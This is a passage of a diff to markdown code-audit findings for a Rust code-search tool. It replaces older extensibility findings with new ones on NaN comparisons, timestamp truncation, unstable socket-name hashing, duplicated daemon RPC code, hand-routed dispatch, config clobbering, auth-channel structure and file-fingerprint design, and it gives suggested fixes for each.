+- **Suggested fix:** Either (a) check `Instant::now() >= deadline` *before* calling `daemon_status`, returning `Timeout(WatchSnapshot::unknown())` when the deadline is already past; or (b) document the actual upper bound in the docstring and the eval gate's "Timeout after N s" message — `(budget_secs, daemon_timeout_secs)` so users know "30s slack on a 600s budget" is by design. Option (a) is the cleaner fix since it makes the contract match the docstring.
 
+#### AC-V1.30.1-7: `BoundedScoreHeap::push` score-equality uses `==` not `total_cmp` — safe today only because `is_finite()` filter precedes
+- **Difficulty:** easy
+- **Location:** src/search/scoring/candidate.rs:231
+- **Description:** Line 231 reads `score > *worst_score || (score == *worst_score && id < *worst_id)`. The `==` between two `f32`s is `PartialEq`, which returns false for `NaN == NaN`. The struct's own `OrderedFloat` wrapper uses `total_cmp` precisely to make NaN comparable, but the eviction-comparison bypasses the wrapper. Today this is safe because line 213 filters `score.is_finite()` upstream, so NaN can't reach this code. But the wrapper exists for a reason; the inconsistency is a footgun — a future refactor that bypasses the `is_finite` filter (e.g. someone adds a "trust the caller" fast path) will silently corrupt the eviction invariant. The neighboring `into_sorted_vec` at line 251 also uses `total_cmp` consistently. The line-231 mix is the lone outlier.
+- **Suggested fix:** Replace `score == *worst_score` with `score.total_cmp(worst_score) == std::cmp::Ordering::Equal`. Pin the invariant with a regression-pin debug-assert that NaN is unreachable here (since the filter is one branch up). The performance delta is zero — `total_cmp` is one inline integer compare on x86.
 
+#### AC-V1.30.1-8: `last_event.elapsed().as_secs()` truncates sub-second freshness — `idle_secs` is 0 for the first second of a stale period
+- **Difficulty:** easy
+- **Location:** src/watch_status.rs:219
+- **Description:** `idle_secs: input.last_event.elapsed().as_secs()` truncates sub-second elapsed time to whole seconds. For a watch loop ticking every 100ms (per the comment at line 64), the first 9 ticks after a file event report `idle_secs == 0` even though `last_event.elapsed()` has actually measured 100ms, 200ms, …, 900ms. A consumer polling `cqs status --watch-fresh --json` to gate "wait for index quiescence" can't distinguish "just-now event" from "990ms-ago event"; both report `0`. The status response's primary purpose is to decide "is the daemon idle enough to safely reindex?" — a millisecond field would be more honest. Compounding: `now_unix_secs()` at line 226 also truncates, so `snapshot_at` and `idle_secs` are both whole-second resolutions, but published at sub-second cadence.
+- **Suggested fix:** Add `idle_ms: u64` (or expand `idle_secs` to `idle_millis`) so consumers polling for quiescence can react sub-second. Keep `idle_secs` for back-compat if any test pins it. Same for `snapshot_at` — emit `snapshot_at_ms: i64` in addition, so a consumer can compute snapshot age sub-second.
+
+#### AC-V1.30.1-9: `daemon_socket_path` uses `DefaultHasher` — collision risk across projects in the same `XDG_RUNTIME_DIR`
+- **Difficulty:** medium
+- **Location:** src/daemon_translate.rs:174-200 (around)
+- **Description:** Socket name uses `DefaultHasher` (SipHash 1-3 with fixed but Rust-version-dependent keys) of the project path, then formats into a fixed-length socket name. The hash output is u64 (truncated to fit the socket-name length budget). For a multi-tenant box running 10+ projects, a u64 collision is mathematically unlikely (~5×10⁻¹⁹), but Rust's docs explicitly say "do not rely on `DefaultHasher` for stable output across compiler versions." A `cargo update` of the std lib could change the hash output, breaking systemd `cqs-watch` services that hardcoded the previous socket name. This is a stability concern more than a collision concern, but the comment at line 170-171 ("not a security property") understates the cross-version-stability gotcha. Also, `DefaultHasher::new()` produces deterministic hashes within ONE run, but the comment about "collision avoidance" implies determinism — which is only guaranteed within a Rust version.
+- **Suggested fix:** Use a stable hash (BLAKE3, SHA256, or even FNV-1a) over the canonical project path bytes, truncated to the socket-name length budget. The codebase already depends on `blake3` (used in reconcile.rs:330 for content hashing). `blake3::hash(path.as_os_str().as_bytes())` is one line, deterministic across Rust versions, and has a 32-byte output of which 8 hex bytes is plenty. Document the hash choice in the docstring so a future maintainer knows the socket name is stable across builds.
+
+#### AC-V1.30.1-10: `incremental_count = 0` reset on idle-clear loses delta context for next rebuild threshold check
+- **Difficulty:** medium
+- **Location:** src/cli/watch/mod.rs:1180
+- **Description:** When the watch loop has been idle for ~5 minutes (3000 cycles × 100ms), it clears the embedder session AND resets `state.incremental_count = 0` AND drops `state.hnsw_index`. The reset of `incremental_count` is the algorithm bug: this counter governs `hnsw_rebuild_threshold` triggering. After 5 minutes idle, the *actual* number of incremental inserts that have accumulated since the last full rebuild is unchanged — the chunks are still in SQLite, the HNSW on disk still has the corresponding nodes (or not, depending on dirty state). Resetting the counter to 0 means the next file event starts the threshold timer from scratch, *understating* delta size. So the next rebuild fires later than it should, leaving the HNSW index further behind SQLite than the threshold contract promises. Snapshot also reports `incremental_count: 0` immediately after idle-clear, which is misleading for `cqs status` consumers. The hnsw_index drop at line 1179 is reasonable (free GPU memory); the counter reset is an over-correction.
+- **Suggested fix:** Don't reset `incremental_count` on idle-clear — only when an actual full rebuild swap completes. The counter's contract is "incremental inserts since last full rebuild", not "since last embedder-session reset". A regression-pin test would seed `state.incremental_count = threshold - 1`, simulate idle-clear, then add ONE file event and assert a full rebuild fires (not an incremental insert).
+# Audit Findings — Extensibility (v1.30.1, 2026-04-28)
+
+Audit mode: ON. Scope: open/closed violations, hardcoded values that should be table-driven, trait-shaped opportunities, multi-file surgery to add a single feature.
+
+Triage state checked against `docs/audit-triage-v1.30.0.md` (no v1.30.1 triage file). Skipped: P2.88 (third score signal), P2.89 (IndexBackend trait — issue #1131 landed), P2.90 (ScoringOverrides resolver), P2.91 (NoteEntry tag taxonomy), P3.26 (`is_pipeable` registry — already fixed via macro), P3.27 (LlmProvider registry), P3.28-29 (fixed), P3.30 (structural_matchers), P3.31 (embedder preset extras hook).
+
+---
 
 ## Extensibility
 
-> Note: every original v1.29.0 finding (EX-V1.29-1 through EX-V1.29-9, archived in `docs/audit-triage-v1.30.0.md`) was substantially closed by #1101 (Local LLM provider), #1105 (slots/cache), #1114 (single-registration command registry), the `define_aux_presets!` table, the `define_chunk_types!` macro, the `define_query_categories!` macro, the `ConfigSection` trait + `ArgMatches::value_source()` shift, the `VisibilityRule::{SigStartsTriage, RegexImportSet, NameCase}` extensions, the `NotesListArgs` flatten, and the `approx_download_bytes` field on `ModelConfig`. The findings below are the residual / new pressure points after that wave.
-
-#### Adding a third score signal requires touching two parallel fusion code paths
+#### EX-V1.30.1-1: `daemon_ping` / `daemon_status` / `daemon_reconcile` are three near-identical 80-LOC copies — adding a fourth daemon RPC means cloning the boilerplate again
 - **Difficulty:** medium
-- **Location:** `src/store/search.rs:182-229` (`Store::rrf_fuse(semantic_ids: &[&str], fts_ids: &[String], limit) -> Vec<(String, f32)>`), `src/search/query.rs:511-720` (`search_hybrid` linear-α dense+sparse), `src/search/query.rs:399` (call site uses 2-list `rrf_fuse`)
-- **Description:** Today there are two completely separate ways to combine ranked candidate lists into a final score:
-  1. `Store::rrf_fuse(semantic_ids, fts_ids, limit)` — RRF formula `1/(k+rank)`, hardcoded to **exactly two** input lists (semantic embedding + FTS keyword). The function signature has named `semantic_ids` and `fts_ids` parameters; adding a third signal (a name-fingerprint signal, a type-overlap signal, the SPLADE sparse list, or the cross-encoder rerank score) requires changing the signature plus every caller.
-  2. `Self::search_hybrid` — a separate dense+sparse linear-interpolation path with its own α knob (`splade_alpha`), its own min-max normalization, its own dedup loop. SPLADE blends here, not via RRF, because RRF is locked to two lists.
-  
-  Concrete symptom: SPLADE is built and persisted at index time, but cannot be one of the inputs to RRF — it lives on a parallel `search_hybrid` path with different normalization (linear interp, not reciprocal-rank). The "type boost" added at `query.rs:449-454` is a *third* score-mutation site (multiplicative post-fusion) that's neither RRF-fused nor α-blended; it's just a hardcoded multiplier applied after the fact. Adding the planned reranker score as a fusion input (rather than the current "rerank top-K post-hoc" mode) would force a fourth bespoke blend path.
-- **Suggested fix:** Generalize `rrf_fuse` to `fn rrf_fuse_n(ranked_lists: &[&[&str]], limit: usize) -> Vec<(String, f32)>` so any number of ranked sources contribute. Optionally introduce `trait ScoreSignal { fn rank(&self, query: &Query) -> Vec<&str>; fn weight(&self) -> f32; }` and a `FusionPipeline` that owns an ordered list of signals — semantic, FTS, SPLADE, name-fingerprint, type-boost all become uniform participants. Either fix collapses two parallel code paths into one and removes the "RRF can't take SPLADE" architectural quirk.
+- **Location:** `src/daemon_translate.rs:271-356, 422-510, 537-621`
+- **Description:** Each function does the same socket connect → set_read_timeout → set_write_timeout → write request line → read response line → parse envelope → check `status == "ok"` → extract `output` → unwrap dispatch payload → deserialize sequence. The only differences across the three copies are: (a) the `command` string in the request, (b) the `tracing::info_span!` name, (c) the deserialized type, and (d) the error tag in `unwrap_dispatch_payload`. The 5-second timeout, 64 KiB read cap, and 6+ `tracing::warn!` `stage=` arms are duplicated verbatim. Adding the next typed daemon RPC (e.g. `daemon_gc`, `daemon_invalidate`, `daemon_flush_caches`, or any of the audit's already-filed P3.27/EX work) requires another ~80-LOC copy with three find-and-replace points. Three is the threshold where the duplication becomes its own bug surface — when the timeout default changes, or when `unwrap_dispatch_payload` grows a new error path, you have three places to sync. It is also the shape EX-V1.29-1 (Commands trait, #1097) was filed for; this is the *daemon-client* side of the same problem.
+- **Suggested fix:** Extract `fn daemon_request<T: DeserializeOwned>(cqs_dir, command: &str, payload_label: &str) -> Result<T, String>` taking the command name and the envelope's expected payload tag. The three public entry points become 3-line shims: `daemon_request(cqs_dir, "ping", "PingResponse")`. Centralizes timeout, cap, span, and warn `stage=` so a future `daemon_gc` is a one-line addition. Composes with `daemon_request_with_args` for the `Reconcile { hook, args }` shape.
 
-#### `BatchCmd::is_pipeable` is a separate exhaustive match outside the command registry
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/commands.rs:325-364` (`BatchCmd::is_pipeable(&self) -> bool`), `src/cli/batch/commands.rs:413-538` (`fn dispatch(ctx, cmd) -> Result<Value>`), `src/cli/registry.rs:55-720` (the `for_each_command!` registry that already classifies commands)
-- **Description:** Issue #1097 (PR #1114) collapsed five Group-A/B exhaustive matches in `dispatch.rs` + `definitions.rs` (`batch_support`, `variant_name`, two dispatch matches, plus the legacy `BatchSupport::Cli/Daemon` decision) into a single `for_each_command!` row per command. But the **batch-side** `BatchCmd` enum was not lifted into the same registry — it still has two exhaustive matches that must be hand-edited per command:
-  - `is_pipeable()` (39-line two-arm match: pipeable vs non-pipeable)
-  - `dispatch()` (130-line single-arm-per-variant match calling `handlers::dispatch_*`)
-  
-  And the batch enum itself lists 31 variants alongside the `Commands` enum — same surface, different file. Verified by reading `cli/batch/commands.rs:413-538` (the dispatch is a per-variant `BatchCmd::Foo { args, .. } => handlers::dispatch_foo(ctx, &args.x, &args.y, …)` chain; pure mechanical mapping, exhaustive, no compile-time link to the `Commands` enum, no link to the `for_each_command!` registry). Reduces #1114's "one row per command" promise to "one row, one batch enum variant, two batch matches".
-- **Suggested fix:** Either (a) drive `BatchCmd` from `for_each_command!` so adding a row in the registry generates the `BatchCmd` variant + `is_pipeable` arm + dispatch arm + handler stub, with the row optionally carrying a `is_pipeable: true` flag and the handler ident. Or (b) merge `Commands` and `BatchCmd` into a single enum (clap derive supports this) with `is_pipeable` derived from a registry attribute. Either path eliminates the parallel batch-side fan-out.
-
-#### `LlmProvider` resolver and `create_client` factory hardcode two providers — no registry, despite already needing one
-- **Difficulty:** easy
-- **Location:** `src/llm/mod.rs:200-205` (`LlmProvider` enum: 2 variants), `:284-304` (`match std::env::var("CQS_LLM_PROVIDER")` matches the strings `"anthropic"` / `"local"` literally), `:362-398` (`create_client` matches `LlmProvider::Anthropic` / `::Local` and constructs the per-provider client + writes the per-provider config-validation error message)
-- **Description:** `create_client` now returns `Box<dyn BatchProvider>` (closing the bulk of EX-V1.29-3), and `LocalProvider` is a real second impl (#1101). But the **registration** of providers is still hand-coded in three places:
-  1. `LlmProvider` enum in `mod.rs:200-205` (one variant per provider)
-  2. `resolve()` env-var match in `mod.rs:284-304` (`Some("anthropic") | None => …, Some("local") => …, Some(other) => warn + default`) — adding a third provider requires another arm here. The env-var-name-to-variant table is implicit in this match.
-  3. `create_client()` factory in `mod.rs:362-398` (one match arm per provider; each arm reads its own env vars — `ANTHROPIC_API_KEY`, etc. — and validates its own preconditions)
-  
-  The `API_BASE` (`https://api.anthropic.com/v1`), `API_VERSION` (`2023-06-01`), and `MODEL` (`claude-haiku-4-5`) constants in `mod.rs:167-169` are still file-level Anthropic defaults; the same constants double-duty as "is this user configured for local?" sentinels at `:381-394` (`if llm_config.api_base == API_BASE { return Err("Local requires CQS_LLM_API_BASE") }`). Add a third provider (e.g. OpenAI cloud, Gemini) and you must add its own sentinel-detection arm too.
-
-  And `batch.rs:64-261` carries 5 hardcoded `header("anthropic-version", API_VERSION)` + `header("x-api-key", &self.api_key)` calls — the `LlmClient` impl bakes Anthropic's auth scheme. A new "OpenAI cloud" provider can't reuse `LlmClient`; it must be a fresh `BatchProvider` impl (which is fine — the trait is set up for it) but the env-var resolver and the factory both still need editing.
-- **Suggested fix:** Introduce `trait ProviderRegistry { fn name(&self) -> &'static str; fn from_env(&self, cfg: &Config) -> Result<Box<dyn BatchProvider>>; }` and an inventory-style `static REGISTRY: &[&dyn ProviderRegistry]`. `resolve()`'s env-var match and `create_client`'s factory both walk the slice. Adding a provider then means: (1) impl `ProviderRegistry` for the new struct, (2) add it to the slice. The `API_BASE / MODEL / API_VERSION` constants move into the Anthropic-specific impl where they belong.
-
-#### Vector index backend selection is a `#[cfg]`-gated hand-coded if/else chain — no `IndexBackend` trait
+#### EX-V1.30.1-2: `BatchCmd` dispatch is a 130-line hand-routed match — the same anti-pattern `is_pipeable` already escaped via macro
 - **Difficulty:** medium
-- **Location:** `src/cli/store.rs:423-540` (`build_vector_index_with_config<Mode>`)
-- **Description:** Today the function is a 120-line `#[cfg(feature = "cuda-index")]` block with three explicit branches: (1) "chunk_count >= cagra_threshold AND gpu_available → CAGRA, try persisted, else build, persist", (2) "chunk_count < cagra_threshold → HNSW", (3) "GPU unavailable → HNSW". Each branch hand-codes the persistence path (`index.cagra` literal, `delete_persisted` cleanup, magic-number checks, fallback-on-failure). Adding a third backend requires:
-  - A new `cagra_threshold`-style `CQS_FOO_THRESHOLD` env var
-  - A new branch in this if/else chain
-  - A new persisted-path literal + load-then-rebuild fallback
-  - A new structured `tracing::info!(backend = "foo", …)` log line per code path
-  - A new `gpu_available()` (or equivalent) gate
-  - A new `delete_persisted` cleanup hook
-  
-  All of this is mechanical; nothing in `index::VectorIndex` lets a backend declare its own threshold / persistence path / availability gate. `VectorIndex` itself is a clean trait (HNSW and CAGRA both implement it), but the **selector** isn't trait-driven. Concrete pressure: the v1.30.0 release ships the `cuda-index` feature split (#956 Phase A) which already names "future Metal / ROCm" backends; each addition will edit this chain again.
-- **Suggested fix:** Extend `VectorIndex` with `fn try_open(cqs_dir: &Path, store: &Store<Mode>) -> Option<Box<dyn VectorIndex>>` (where `None` means "I'm not the right backend for this config") and `fn priority(store: &Store) -> i32` (higher wins). Build a `&[&dyn IndexBackend]` slice; selection iterates highest-priority-first and returns the first non-None `try_open`. The `cagra_threshold` lives inside CAGRA's `try_open`, the `gpu_available` lives inside CAGRA's `priority`, the `index.cagra` filename lives inside CAGRA's persistence. HNSW becomes the always-priority-zero fallback. New backends are pure additions to the slice.
+- **Location:** `src/cli/batch/commands.rs:503-636` (dispatch) vs `:372-447` (the macro-driven `is_pipeable` table)
+- **Description:** Variant pipeability is now table-driven (issue #1137 fix, lines 372-447): adding a `BatchCmd` variant *requires* adding a `(Variant, bool)` row to `for_each_batch_cmd_pipeability!` or the build fails. But the `dispatch()` function 60 lines further down is still a hand-maintained match: `BatchCmd::Search { args, .. } => handlers::dispatch_search(...)`, `BatchCmd::Callers { args, .. } => handlers::dispatch_callers(...)`, etc. — 33 arms, one per variant. Adding a new `BatchCmd` variant means: (a) add the variant, (b) add the pipeability row (compile-enforced), (c) add the dispatch arm (NOT compile-enforced — the match has no `_` wildcard *now* but a future refactor that adds one would silently route new variants to nowhere), (d) write the handler. The dispatch arms are the largest still-hand-coded surface in the daemon; the `Commands trait` work in #1097 addresses the CLI side (`cli/dispatch.rs`) but leaves this. `Refresh` is also special-cased *outside* `dispatch()` in `dispatch_via_view` (line 1481) which compounds the surgery cost — a new "side-effect" command (e.g. `Reindex`, `Quarantine`, `Migrate`) requires touching `dispatch_via_view` *and* `dispatch` *and* the pipeability table.
+- **Suggested fix:** Extend the macro table to carry the handler function pointer per row: `(Search, false, dispatch_search, args)`. The macro emits both `is_pipeable` and a single `dispatch_handler` function. Side-effect commands like `Refresh` get a third column flag (`needs_outer_lock`) so `dispatch_via_view` consults the same table instead of an `if matches!()` special case. Reduces the cost of a new command from "edit 4 places" to "edit 1 row + write handler".
 
-#### Tree-sitter query files are wired by `include_str!` per-row — no runtime / startup self-test that registry → query files are consistent
+#### EX-V1.30.1-3: `log_query` is hand-sprinkled across 6 dispatch arms — not a property of the command
 - **Difficulty:** easy
-- **Location:** `src/language/queries/*.scm` (109 files), `src/language/languages.rs` (each row uses `chunk_query: include_str!("queries/<lang>.chunks.scm")`), no test that asserts coverage
-- **Description:** Each `LanguageDef` row in `languages.rs` literally embeds its query strings via `include_str!("queries/<name>.<kind>.scm")`. A typo in the path is a build error — that part is fine. But:
-  - There's no test that iterates `REGISTRY.all()` and asserts every code-carrying language has a non-empty `chunk_query` (an empty .scm file `include_str!`s as `""` and compiles to a no-op tree-sitter query — the language silently emits zero chunks).
-  - There's no test that scans `src/language/queries/*.scm` and asserts every file is referenced by at least one language row (orphan .scm files don't break anything but are pure dead weight, and a *partially wired* language — chunks.scm but no calls.scm — won't error at compile time even though the runtime impact is "calls graph never populated for this language").
-  - Adding a new query kind (e.g. a hypothetical `docs.scm` for docstring extraction) means editing every `definition_*` function to add an `include_str!` arm, with no compile-time assertion that "every language with a grammar declared a docs.scm".
-  
-  Verified by walking `language/queries/`: 109 files, no `tests/queries_consistent.rs` or similar self-test. The 54 supported languages × up to 3 query kinds = 162 cells, ~109 files filled — the gap (53 missing-by-design) is invisible without a registry walk.
-- **Suggested fix:** Add a single `#[test] fn registry_coverage() { for lang in REGISTRY.all() { if has_grammar(lang) { assert!(!lang.chunk_query.is_empty(), "{lang:?} chunk_query empty"); } } }` in `language/mod.rs`. Catches the silent-empty-query trap with a single test. For new query kinds, layer a `phf`-style `static QUERIES: phf::Map<(&str, QueryKind), &str>` so adding a kind requires editing the map (one place) instead of every `definition_*` function.
+- **Location:** `src/cli/batch/commands.rs:508, 531, 567, 577, 581, 603` (call sites of `log_query`)
+- **Description:** `log_query("search", &args.query)`, `log_query("gather", &args.query)`, `log_query("onboard", &args.query)`, `log_query("scout", &args.query)`, `log_query("where", &args.description)`, `log_query("task", &args.description)`. Six identical-shape calls inside `dispatch()` arms. Adding a new query-shaped command (e.g. a hypothetical `cqs ask`) requires remembering to also call `log_query("ask", ...)`. The set of commands that *should* log is a static property of the variant (commands that take a free-text query, used by eval workflow capture) and belongs in the same table as `is_pipeable` — not at every individual dispatch site. Equally, *which* arg field carries the query (`args.query` vs `args.description`) is itself an inconsistency: `Where` and `Task` use `description`, the other four use `query`. Adding a new query-shaped command means: (a) add the dispatch arm, (b) remember to call `log_query`, (c) decide what the arg-struct field should be called. (b) and (c) silently differ today.
+- **Suggested fix:** Extend the same dispatch macro proposed in EX-V1.30.1-2 with a `log_as: Option<&str>` column. The macro emits the `log_query` call automatically when `log_as` is `Some`. While there, normalize the arg-struct field name to `query` for query-shaped commands (or add a `fn query(&self) -> &str` accessor on the arg structs) so the macro can emit `log_query` without the per-variant field-name divergence.
 
-#### `ScoringOverrides` adds a knob → must edit 4 sites (struct, defaults, env-var resolver, consumer)
+#### EX-V1.30.1-4: `write_slot_model` clobbers all non-`[embedding]` keys on every write — adding any new slot metadata field is a breaking schema change
 - **Difficulty:** medium
-- **Location:** `src/config.rs:153-172` (`ScoringOverrides` struct, 11 `Option<f32>` fields), `src/search/scoring/*.rs` (`ScoringConfig::DEFAULT` consts), `src/store/search.rs:11-42` (`RRF_K_CONFIG_OVERRIDE` + `rrf_k()` env-var-or-config resolver — one of these per knob), wherever the consumer reads it
-- **Description:** Each scoring knob (`name_exact`, `parent_boost_cap`, `splade_alpha`, `rrf_k`, …) requires editing four places: (1) the struct, (2) a `pub const DEFAULT_*: f32 = …` sibling, (3) the per-knob env-var resolver function (e.g., `fn rrf_k() -> f32`), (4) the consumer that reads the resolved value. There's no shared resolver. Concrete: adding the queued "type boost factor" knob (`CQS_TYPE_BOOST` is already an env override at `query.rs:449-454`, but it doesn't appear in `ScoringOverrides` so it's environment-only — the `.cqs.toml` `[scoring]` section can't set it). New scoring knobs added by the same author have already drifted out of the `[scoring]` section schema.
-- **Suggested fix:** Make `ScoringOverrides` a `HashMap<&'static str, f32>` (or a `serde(flatten)` wrapper) plus a `static SCORING_KNOBS: &[ScoringKnob]` table where each row is `(name, env_var, default, kind)`. Resolver becomes `fn resolve_knob(name: &str) -> f32` driven by the table. Adding a knob = one row. Drops the four-site fan-out to one. Bonus: enables `cqs config show` to dump every knob and its source (env / config / default) without keeping a hand-maintained list.
+- **Location:** `src/slot/mod.rs:307-351` (and the doc lie at `:301-302`)
+- **Description:** The function's doc comment claims "Existing TOML keys outside `[embedding]` are not preserved — slot.toml is owned by cqs" — i.e. *acknowledges* the issue and waves it away with "users shouldn't hand-edit it". The body confirms: line 326 emits `format!("[embedding]\nmodel = {}\n", ...)` and overwrites the file with that single section. The deserialize side at `:283-286` only reads `[embedding].model`. Practical extensibility cost: adding *any* future per-slot field (issue #1107 already filed for `--model` not being persisted on `slot create`; obvious candidates are `[reranker]`, `[splade]`, `[index].backend`, `[chunk].max_seq_len`, per-slot `[ignore]` overrides, etc.) requires (a) adding the field to `SlotConfigFile`, (b) extending `write_slot_model` to accept and serialize it, (c) renaming `write_slot_model` to something like `write_slot_config` because it now writes more than the model, (d) auditing every existing slot.toml since old files don't carry the new section. The "owned by cqs" hand-wave is the same shape that bites every "don't edit this file" config — eventually a feature wants user input or composition, and the round-trip-clobber design makes it expensive. Compounds with #1107: that bug is filed against `slot create --model`; *fixing* it via this code path would require this function to first do a read-modify-write rather than the current write-only.
+- **Suggested fix:** Replace the hand-written `format!()` with a `toml_edit::Document` round-trip (a few lines via the `toml_edit` crate already in workspace dependencies, or a hand-rolled section-preserving edit). Rename `write_slot_model` → `update_slot_field` taking `(section, key, value)`, or expose a `SlotConfig` builder so each future field is one accessor. Either approach makes the next slot field zero-cost rather than a migration event.
 
-#### `NoteEntry` has no kind / tag taxonomy — sentiment-only, can't filter for a class
+#### EX-V1.30.1-5: `check_request` is a hardcoded three-channel `if/else` ladder — adding a fourth auth channel (mTLS, API key, JWT) requires touching the function plus its strip-token sibling
 - **Difficulty:** medium
-- **Location:** `src/note.rs:41-67` (`NoteEntry { sentiment: f32, ... }`, `Note { sentiment: f32, ... }`), `src/note.rs:79-89` (sentiment → "Warning: " / "Pattern: " prefix is the only kind taxonomy)
-- **Description:** Notes carry a single `sentiment: f32` axis (CLAUDE.md documents 5 discrete values: `-1, -0.5, 0, 0.5, 1`). The only "kind" is implicit: sentiment < `-0.3` → "Warning:", sentiment > `+0.3` → "Pattern:", else neutral. There's no formal `kind` field. Adding a separate retrievable note class (e.g. `kind = "todo"` / `"design-decision"` / `"deprecation"` / `"known-bug"` — all of which appear in MEMORY.md and PROJECT_CONTINUITY.md as ad-hoc text patterns the user wants searchable) requires:
-  - Schema migration: new `notes.kind TEXT` column
-  - `NoteEntry` struct change
-  - TOML serialization roundtrip update (`docs/notes.toml` parser)
-  - `cqs notes add --kind …` flag
-  - Search filter: `cqs notes list --kind …`
-  - Sentiment-prefix logic at `note.rs:79-89` becomes kind-prefix
-  
-  Today the workaround is "encode the kind in the note text" (e.g. `"TODO: rebuild HNSW after migration"`), which is unsearchable as structured data. The schema-version churn for adding a column is the friction — CLAUDE.md "always do things properly" doesn't currently extend to notes shape.
-- **Suggested fix:** Add a `kind: Option<String>` field on `NoteEntry` (free-string, not enum, so it's not a 50-language-style registry problem). Add a `notes.kind` SQLite column at the next schema bump. Treat `sentiment_to_prefix` as the legacy fallback for entries with `kind = None`. Filter shape: `cqs notes list --kind todo` becomes a column filter, not a regex on `text`.
+- **Location:** `src/serve/auth.rs:269-321` (check_request) + `:246-260` (strip_token_param) + `:323-332` (AuthOutcome enum)
+- **Description:** `check_request` walks three explicit code blocks, in order: (1) `Authorization: Bearer …` header (lines 270-280), (2) `cqs_token_<port>` cookie (lines 287-300), (3) `?token=…` query param (lines 305-318). Each block has its own `for/loop`, its own `ct_eq` call, and its own success-return. Adding a fourth channel — say, an mTLS client cert (the SECURITY threat model already references this), an API key for headless CI, a session JWT for audit-trail integration, or an SSO bearer — requires: (a) a new code block in `check_request`, (b) potentially a new `AuthOutcome` variant if the channel needs special-case post-auth behaviour (the way `OkViaQueryParam` triggers a redirect), (c) a sibling helper if the channel needs sanitization (the way `strip_token_param` strips `?token=`), (d) explicit ordering decision (does mTLS supersede a bearer header?). Today's three channels also have a known leakage gap (`strip_token_param` doesn't case-fold or percent-decode — already reported in code-quality batch 1) that *should* be a property of the channel module, not a free function bolted onto the URI walk. The `AuthOutcome` enum is the natural seam here but it currently encodes "what to do post-auth", not "which channel matched", so it can't be inverted into a channel registry without enum churn.
+- **Suggested fix:** Define `trait AuthChannel { fn check(&self, req: &Request) -> Option<ChannelMatch>; fn sanitize_request(&self, req: &mut Request); }` and an `AuthChannelRegistry` holding `Vec<Box<dyn AuthChannel>>` evaluated in priority order. Each existing channel becomes one impl (~30 LOC). The query-param channel's `sanitize_request` does the strip-token work. Adding mTLS/API key/JWT becomes "implement the trait, add to the registry constructor". The `AuthOutcome` enum collapses into `Option<ChannelMatch { needs_redirect: bool }>` — single decision point.
 
-#### `LanguageDef::structural_matchers` is per-language `Option<&[(name, fn)]>` — no shared library of common matchers
+#### EX-V1.30.1-6: Reconcile fingerprint is `(path, mtime)` only — adding content-hash or size detection requires schema migration plus rewriting the divergence logic
+- **Difficulty:** hard
+- **Location:** `src/cli/watch/reconcile.rs:84-134` (run_daemon_reconcile) and `Store::indexed_file_origins` (returns `HashMap<String, Option<i64>>` — origin → stored mtime)
+- **Description:** `run_daemon_reconcile` decides "is this file divergent?" by `disk > stored` mtime comparison only (line 124). Two well-known reconciliation bugs slip through this fingerprint: (a) **mtime collisions on coarse-grained filesystems** — the existing comment on `events.rs:85-100` explicitly notes WSL DrvFS / NTFS coarse mtime resolution causes ties to be skipped, and the workaround was a per-FS `mtime < last` vs `<=` toggle. The same coarse-mtime issue applies on disk-walk reconcile but isn't compensated. (b) **content-identical-but-mtime-bumped** files (formatter passes, `touch`, branch checkouts that restore the same content) are re-embedded for nothing — full embedder cost on every `git checkout`. The fingerprint shape is hardcoded into both the SQLite column choice (`indexed_files.last_indexed_mtime` is a single i64) and the in-memory map type (`HashMap<String, Option<i64>>`). Adding a content hash column means: (a) schema v23 + migration, (b) widen `indexed_file_origins`'s return type from `Option<i64>` to a struct, (c) update *every caller* of `indexed_file_origins` (the daemon GC sweep, the reconcile pass, any future tools), (d) extend reconcile's tuple-match arm to handle hash + mtime + size, (e) decide policy when only one of the three diverges. Today the design is anchored to a single-field stored mtime — every consumer assumes that shape.
+- **Suggested fix:** Introduce a `FileFingerprint { mtime: Option<i64>, size: Option<u64>, content_hash: Option<[u8; 32]> }` struct returned from `indexed_file_origins`. Schema column lands as a nullable BLOB; mtime stays the cheap path, size/hash become opt-in via `cqs index --strict`. `run_daemon_reconcile` calls `disk.matches(stored, FingerprintPolicy::MtimeOrHash)` so the divergence policy is one place, not 5 callsites. Pays for itself the first time someone runs an audit pass that bumps mtimes on 4000 files.
+
+#### EX-V1.30.1-7: Env-var falsy parsing (`"0" | "false" | "no" | "off"`) is hand-rolled in `eval/mod.rs` and not reused for the 30+ other CQS_* env vars
 - **Difficulty:** easy
-- **Location:** `src/language/mod.rs:191` (`type StructuralMatcherFn = fn(&str, &str) -> bool;`), `:345` (`pub structural_matchers: Option<&'static [(&'static str, StructuralMatcherFn)]>`), `src/structural.rs:93-98` (lookup site)
-- **Description:** Structural matchers exist for one language so far (Rust, by reading `structural_matchers_default_none` at `language/mod.rs:2391-2395` — every other language returns `None`). The shape `Option<&'static [(&str, fn)]>` is fine for one language but doesn't scale: adding the same "swallow exceptions" or "async hot path" patterns for Python/JS/Go means rewriting the same predicate function bodies in each `definition_*` row, with no shared library. The Patterns enum at `structural.rs:44` already encodes language-agnostic ideas (`SwallowedException`, `AsyncIO`, `Mutex`, `Unsafe`) — but the matchers are per-language fn pointers, not a `(Pattern, Language) -> bool` table. The cross-language tests at `structural.rs:319-388` already cover Python/JS/Go/Rust for the *fallback regex matcher*, but the language-tuned matchers only exist for Rust.
-- **Suggested fix:** Move structural matchers to a `(Pattern, Language) -> Option<&'static dyn Fn(&str, &str) -> bool>` table (or expand `LanguageDef` rows to declare a `structural_matchers: &[(Pattern, fn)]` slice referencing shared functions). Adding the same pattern across 5 languages becomes 5 table rows pointing at one function, not 5 separate fn definitions per `definition_*`.
+- **Location:** `src/cli/commands/eval/mod.rs:282-289` (`env_disables_freshness_gate`) — the falsy match is at line 286
